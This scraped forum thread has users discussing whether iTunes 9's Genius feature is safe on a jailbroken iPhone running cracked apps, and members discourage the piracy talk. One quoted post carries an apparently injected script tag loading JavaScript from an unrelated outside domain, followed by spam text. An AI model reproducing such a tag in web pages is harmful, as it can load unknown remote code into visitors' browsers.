Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: New Genius Feature in iTunes 9

iPhone? More like MyPhone
    Thanks

Default New Genius Feature in iTunes 9
    I'm wondering if it's safe to enable the Genius feature on the iphone 3g when its unlocked, jailbroken, and running some cracked apps. Has anyone does this, or does anyone know if it has the potential of ruining future unlocking potentials?

Livin the iPhone Life seann33uk's Avatar
    Thanks

they could probably lock your phone
    but im guessing it just checks on what you like to download OFFICIALLY and give you suggestions on what else you like.
    Being an i can be a lot of pressure. you have to live right up to the small point.

Thanks
    Thanked 1,182 Times in 915 Posts

I don't use any of the genius features because I know what I like and find them easily on my own. I am not sure how the app genius works but I have heard that it does not work to well. It suggested apps that you give low ratings to and delete. I don't remember if it was on here or another forum about the issues it has.

Also it is best not to talk about cracked apps in any way or form. It is against the rules.

Quote Originally Posted by seann33uk View Post
    they could probably lock your phone
    but im guessing it just checks on what you like to download OFFICIALLY and give you suggestions on what else you like.
    Semi-right: App Genius works like Amazons "customers who purchased X also got...". It'll poll who downloads what and what else they get and get you results based on that. It's a bit rough around the edges but I think it's a nice tool to add for app discovering.

I'm a helpful jerk, fear me.

It's iTunes account based(uses purchase history) so jailbreaking shouldn't mess I up at all

iPhone? More like MyPhone
    Thanks

alright...lets say I've been trying an app store app out that I grabbed from **********. Will its presence on my phone mess with the genius feature or cause any problems? Anybody tried this?

Read my last post!!!!!!!!!! It answers your question. Also, doesn't the fact that the word is *****ed out tell u u shouldn't be posting about that?

Quote Originally Posted by ThaNatrix View Post
    I'm wondering if it's safe to enable the Genius feature on the iphone 3g when its unlocked, jailbroken, and running some cracked apps. Has anyone does this, or does anyone know if it has the potential of ruining future unlocking potentials?<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    On September 9th Apple CEO Steve Jobs announced some new iPods and a new version of iTunes. iTunes 9 has some significant new features including the ability to share media files around the home, a new "Genius Mix" and "iTunes LP" which offers liner notes, videos and other extras along with the music.

The day after the announcement, Larry Magid talked with Eddy Cue, Apple's Vice President of Internet services. We also discussed some other issues with iTunes indcluding how to get maximum sound quality from iTunes downloads.

How does that post help anybody?